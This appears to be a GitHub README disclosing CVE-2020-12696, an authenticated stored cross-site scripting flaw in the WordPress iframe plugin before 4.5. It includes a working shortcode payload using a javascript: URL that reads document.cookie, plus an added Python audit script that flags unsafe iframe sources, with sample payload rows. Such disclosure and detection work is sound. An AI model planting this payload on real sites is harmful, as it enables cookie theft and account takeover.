
g-rubert/CVE-2020-12696


CVE-2020-12696

██╗  ██╗███████╗███████╗
╚██╗██╔╝██╔════╝██╔════╝
 ╚███╔╝ ███████╗███████╗
 ██╔██╗ ╚════██║╚════██║
██╔╝ ██╗███████║███████║
╚═╝  ╚═╝╚══════╝╚══════╝

Iframe < 4.5 - Authenticated Stored Cross Site Scripting (XSS)

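The iframe plugin for WordPress before 4.5 does not sanitize the URL supplied in its shortcode's src attribute, so a javascript: URL such as the payload below is accepted.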

Payload: [iframe src="javascript:confirm(document.cookie)" width="100%" height="500"]
Version [plugin]: 4.4
Tested on: WordPress 5.2.4
Researcher: Guilherme Rubert
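
An added example, not part of this repository or of the plugin's code: a Python audit that scans stored post content for [iframe] shortcodes whose src carries a scheme other than http or https, which is how a payload like the one above would appear in the database. The function names, the scheme allowlist and the sample posts are assumptions constructed for illustration.

```python
import html
import re

# Matches the plugin's shortcode tag and captures its attribute string.
SHORTCODE_RE = re.compile(r"\[iframe\b([^\]]*)\]", re.IGNORECASE)
# Attribute forms: name="value", name='value' or name=value
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'\]]+))""")
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):")
# Assumption: only web URLs are legitimate iframe sources on this site.
ALLOWED_SCHEMES = {"http", "https"}


def normalise(url):
    """Decode HTML entities, drop whitespace/control characters, lowercase."""
    url = html.unescape(url)
    return re.sub(r"[\x00-\x20\x7f]+", "", url).lower()


def unsafe_src(url):
    """Return True when the URL carries a scheme outside the allowlist."""
    match = SCHEME_RE.match(normalise(url))
    return bool(match) and match.group(1) not in ALLOWED_SCHEMES


def audit(posts):
    """Return [(post_id, src)] for every [iframe] shortcode with an unsafe src."""
    findings = []
    for post_id, content in posts:
        for shortcode in SHORTCODE_RE.finditer(content):
            for name, dq, sq, bare in ATTR_RE.findall(shortcode.group(1)):
                value = dq or sq or bare
                if name.lower() == "src" and unsafe_src(value):
                    findings.append((post_id, value))
    return findings


# Constructed sample rows standing in for (ID, post_content) from the posts table.
SAMPLE_POSTS = [
    (1, '[iframe src="https://example.com/embed" width="100%" height="500"]'),
    (2, '[iframe src="javascript:confirm(document.cookie)" width="100%" height="500"]'),
    (3, "Intro text [iframe src=' JavaScript:confirm(1)' height=\"300\"] outro"),
    (4, '[iframe src="/local/page.html"]'),
    (5, '[iframe src="data:text/html,hello"]'),
]

if __name__ == "__main__":
    for post_id, src in audit(SAMPLE_POSTS):
        print(f"post {post_id}: unsafe iframe src {src!r}")
```

Relative and scheme-less URLs pass the check; anything with an explicit scheme other than http or https is reported for review.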

References:

https://guilhermerubert.com/blog/cve-2020-12696/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12696
https://wordpress.org/plugins/iframe/#developers

About

Stored Cross Site Scripting - Iframe Plugin - WordPress
